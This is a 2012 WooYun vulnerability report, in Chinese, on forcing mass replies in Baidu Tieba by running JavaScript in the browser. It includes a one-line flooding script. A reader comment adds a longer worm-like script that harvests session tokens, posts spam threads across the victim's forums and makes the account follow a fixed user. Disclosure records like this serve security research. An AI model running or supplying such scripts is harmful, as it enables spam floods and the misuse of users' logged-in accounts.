IE执行JAVASCRIPT导致百度等贴吧强制回复

漏洞概要

缺陷编号:WooYun-2012-06338

漏洞标题:IE执行JAVASCRIPT导致百度等贴吧强制回复

相关厂商:百度

漏洞作者:tianmu

提交时间:2012-04-24 18:42

公开时间:2012-06-08 18:43

漏洞类型:应用配置错误

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-04-24: 细节已通知厂商并且等待厂商处理中
2012-04-25: 厂商已经确认,细节仅向厂商公开
2012-05-05: 细节向核心白帽子及相关领域专家公开
2012-05-15: 细节向普通白帽子公开
2012-05-25: 细节向实习白帽子公开
2012-06-08: 细节向公众公开

简要描述:

在IE浏览器等浏览器中执行javascript代码,在百度贴吧等地方无验证码的情况下导致循环回帖。最终达到爆吧效果

详细说明:

javascript:var c=rich_postor._getData();c.content='&#25105;&#29233;&#20320;';for(var i=1;i<=999;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0登录账号后,只要达到无验证码权限,进入帖子页面后,在浏览器粘贴此代码将自动回帖。

漏洞证明:

数页回复均为此类

修复方案:

暂无有效防护

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-04-25 17:30

厂商回复:

贴吧在单位时间内的回复数量是有一定限制的,不只是验证码。
感谢提交~~

最新状态:

暂无

评价

  1. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    应该与是否使用javascript无关吧

  2. 2010-01-01 00:00 imlonghao 白帽子 | Rank:703 漏洞数:73)

    @xsser 对了 咱首页下面给CNVD的大大的图片链接过去404了,人家改版了,是不是也应该同步?

  3. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @imlonghao 额...好 上次和他们提过的

  4. 2010-01-01 00:00 水滴 白帽子 | Rank:146 漏洞数:24)

    = = 这。。

  5. 2010-01-01 00:00 horseluke 白帽子 | Rank:108 漏洞数:18)

    @xsser 地址改成了:http://www.cert.org.cn/publish/main/12/2012/20120330183903150713234/20120330183903150713234_.html

  6. 2010-01-01 00:00 一刀终情 白帽子 | Rank:154 漏洞数:27)

    关注下

  7. 2010-01-01 00:00 Finger 白帽子 | Rank:748 漏洞数:95)

    @xsser 现在需要人工审核的漏洞 好慢啊 几个人在审核啊?

  8. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @Finger 恩 内容越来越多,越来越杂呢

  9. 2010-01-01 00:00 Say 白帽子 | Rank:17 漏洞数:4)

    function getmyforum(url){
    xmlHttp = createXHR();
    xmlHttp.open("GET",url,false);
    xmlHttp.send();
    result = xmlHttp.responseText;
    result = result.match(/\/f\?kw=[A-Z0-9\%]*&from=ucenter/g);
    return result;
    }
    function getarg(forumurl){
    xmlHttp = createXHR();
    xmlHttp.open("GET",forumurl,false);
    xmlHttp.send();
    result = xmlHttp.responseText;
    forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"')[6];
    forumname = encodeURIComponent(forumname);
    fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"')[6];
    tbs = result.match("PageData.tbs = \"[a-z0-9]+\";").toString().split('"')[1];
    return [forumname,fid,tbs];
    }
    function publish_delay(data,i){
    var t=setTimeout("publish(data)",1000*i);
    }
    function publish(data){
    url="http://tieba.baidu.com/f/commit/thread/add";
    xmlHttp = createXHR();
    xmlHttp.open("POST",url,false);
    xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
    }
    function followme(){
    url = "http://tieba.baidu.com/i/181104344";
    xmlHttp = createXHR();
    xmlHttp.open("GET",url,false);
    xmlHttp.send();
    result = xmlHttp.responseText;
    tbs = result.match("[^_]tbs : \"[0-9a-z]*\"").toString().split('"')[1];
    portrait = result.match(/UserInfo.request\(\"[0-9a-z]*/).toString().split('"')[1];
    if(tbs == null || portrait == null){
    return;
    }
    inf = 'cmd=follow&tbs=' + tbs + '&portrait=' + portrait;
    url="http://tieba.baidu.com/i/commit?stamp=" + new Date().getTime();;
    xmlHttp = createXHR();
    xmlHttp.open("POST",url);
    xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(inf);
    }
    function random_msg(){
    var tarr = new Array(
    '说不过就删帖封号,有意思吗?',
    '这个楼我们一定要盖啊啊啊?',
    '绝对震撼人心的语录,2011年',
    '显然,或者,哦,这事做错了?');
    var carr = new Array(
    ' RT ',
    ' 难道不是吗? ',
    ' 如题',
    '我想说啥来着??',
    '我爱大清国,我怕他完了....');
    title = tarr[Math.floor(Math.random()*(tarr.length))];
    content = carr[Math.floor(Math.random()*(carr.length))];
    return [encodeURIComponent(title),encodeURIComponent(content)];
    }

    我还记得这个。。。

  10. 2010-01-01 00:00 horseluke 白帽子 | Rank:108 漏洞数:18)

    想起经典的dz爆贴代码......